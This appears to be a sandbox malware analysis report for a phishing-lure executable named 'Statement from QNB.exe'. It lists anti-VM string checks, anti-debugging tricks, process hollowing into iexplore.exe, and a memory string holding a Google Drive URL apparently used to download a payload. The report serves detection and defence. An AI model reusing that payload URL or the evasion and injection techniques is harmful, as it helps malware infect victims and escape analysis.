Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_004080D9 FindFirstFileW,FindNextFileW,FindClose, 17_2_004080D9
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 18_2_0040423A FindFirstFileA,FindNextFileA, 18_2_0040423A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 20_2_0040537B FindFirstFileW,FindNextFileW,wcslen,wcslen, 20_2_0040537B
Source: C:\Users\user\Desktop\Statement from QNB.exe System information queried: ModuleInformation Jump to behavior
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652033906.000000000072D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0O
Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmp Binary or memory string: iles\Qemu-ga\qemu-ga.exe
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmp Binary or memory string: \qemu-ga.exe
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81296329023.0000000000684000.00000004.00000020.sdmp Binary or memory string: \Qemu-ga\qemu-ga.exe]
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Statement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000002.81017793700.0000000000842000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000002.81018130653.0000000000865000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499701669.000000000092E000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578596018.0000000000A5F000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81577732340.00000000009C8000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652033906.000000000072D000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651299450.00000000006C3000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499073126.00000000008C2000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@n
Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Statement from QNB.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 17_2_00408B60
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00404C9D LoadLibraryA,GetProcAddress, 14_2_00404C9D
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0230377C rdtsc 0_2_0230377C
Enables debug privileges
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FD0BD mov eax, dword ptr fs:[00000030h] 0_2_022FD0BD
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02302CF6 mov eax, dword ptr fs:[00000030h] 0_2_02302CF6
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_023020CD mov eax, dword ptr fs:[00000030h] 0_2_023020CD
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02304D65 mov eax, dword ptr fs:[00000030h] 0_2_02304D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BED0BD mov eax, dword ptr fs:[00000030h] 15_2_02BED0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF2CF6 mov eax, dword ptr fs:[00000030h] 15_2_02BF2CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF20CD mov eax, dword ptr fs:[00000030h] 15_2_02BF20CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF4D65 mov eax, dword ptr fs:[00000030h] 15_2_02BF4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C2CF6 mov eax, dword ptr fs:[00000030h] 21_2_006C2CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C20CD mov eax, dword ptr fs:[00000030h] 21_2_006C20CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BD0BD mov eax, dword ptr fs:[00000030h] 21_2_006BD0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C4D65 mov eax, dword ptr fs:[00000030h] 21_2_006C4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF20CD mov eax, dword ptr fs:[00000030h] 22_2_02CF20CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF2CF6 mov eax, dword ptr fs:[00000030h] 22_2_02CF2CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CED0BD mov eax, dword ptr fs:[00000030h] 22_2_02CED0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF4D65 mov eax, dword ptr fs:[00000030h] 22_2_02CF4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_005720CD mov eax, dword ptr fs:[00000030h] 23_2_005720CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00572CF6 mov eax, dword ptr fs:[00000030h] 23_2_00572CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056D0BD mov eax, dword ptr fs:[00000030h] 23_2_0056D0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00574D65 mov eax, dword ptr fs:[00000030h] 23_2_00574D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_005720CD mov eax, dword ptr fs:[00000030h] 25_2_005720CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00572CF6 mov eax, dword ptr fs:[00000030h] 25_2_00572CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056D0BD mov eax, dword ptr fs:[00000030h] 25_2_0056D0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00574D65 mov eax, dword ptr fs:[00000030h] 25_2_00574D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_005720CD mov eax, dword ptr fs:[00000030h] 26_2_005720CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00572CF6 mov eax, dword ptr fs:[00000030h] 26_2_00572CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056D0BD mov eax, dword ptr fs:[00000030h] 26_2_0056D0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00574D65 mov eax, dword ptr fs:[00000030h] 26_2_00574D65
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Statement from QNB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FD72E LdrInitializeThunk, 0_2_022FD72E
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF697A RtlAddVectoredExceptionHandler, 22_2_02CF697A

HIPS / PFW / Operating System Protection Evasion:

barindex
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Statement from QNB.exe Section unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 43E000 Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 442000 Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2C50008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\user\Desktop\Statement from QNB.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
